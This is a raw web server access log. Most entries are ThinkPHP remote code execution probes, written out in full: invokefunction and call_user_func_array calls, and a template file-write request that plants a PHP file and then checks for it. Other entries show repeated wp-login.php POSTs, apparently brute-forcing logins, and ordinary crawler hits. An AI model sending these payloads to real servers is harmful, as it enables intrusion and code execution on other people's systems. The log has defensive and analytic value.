101.226.10.126 - - [26/Aug/2026:20:24:56 +0200] "GET /index.php?s=my-show-id-\x5Cx5C..\x5Cx5CRuntime\x5Cx5CLogs\x5Cx5C26_08_27.log%27 HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:57 +0200] "GET /index.php?s=index/think\x5Capp/invokefunction&function=phpinfo&vars%5B0%5D=-1 HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:57 +0200] "GET /index.php?s=index/\x5Cthink\x5CContainer/invokefunction&function=call_user_func_array&vars%5B0%5D=var_dump&vars%5B1%5D%5B%5D=((md5(2333)) HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:24:58 +0200] "POST /public/index.php HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:25:01 +0200] "GET /index.php?s=index/\x5Cthink\x5CRequest/input&filter=var_dump&data=md5(2333) HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:25:01 +0200] "POST /index.php?s=captcha HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:25:03 +0200] "POST /index.php?s=captcha HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:25:05 +0200] "POST /index.php/index HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:25:07 +0200] "POST /index.php/index HTTP/1.1" 301 162 "-" "-"
93.46.24.112 - - [26/Aug/2026:20:25:07 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
101.226.10.126 - - [26/Aug/2026:20:25:10 +0200] "POST /index.php?s=index/index/index HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:25:11 +0200] "POST /index.php?s=index/index/index HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:25:13 +0200] "GET /index.php?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=mqz.php&content=%3C?php%20var_dump(md5(2333));?%3E HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:25:13 +0200] "GET /mqz.php HTTP/1.1" 301 162 "-" "-"
101.226.10.126 - - [26/Aug/2026:20:25:15 +0200] "GET /dpuyckh.php HTTP/1.1" 301 162 "-" "-"
93.46.24.112 - - [26/Aug/2026:20:49:34 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
43.130.3.122 - - [26/Aug/2026:21:02:09 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.46.24.112 - - [26/Aug/2026:21:13:48 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
216.244.66.239 - - [26/Aug/2026:21:26:33 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.239 - - [26/Aug/2026:21:26:35 +0200] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
93.46.24.112 - - [26/Aug/2026:21:38:07 +0200] "POST /wp-login.php HTTP/1.1" 301 162 "http://grupo-seg.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
106.52.49.148 - - [26/Aug/2026:21:43:30 +0200] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
